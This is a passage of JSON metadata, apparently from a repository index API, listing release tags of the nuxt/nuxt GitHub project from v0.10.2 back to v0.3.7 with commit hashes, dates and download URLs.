.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nux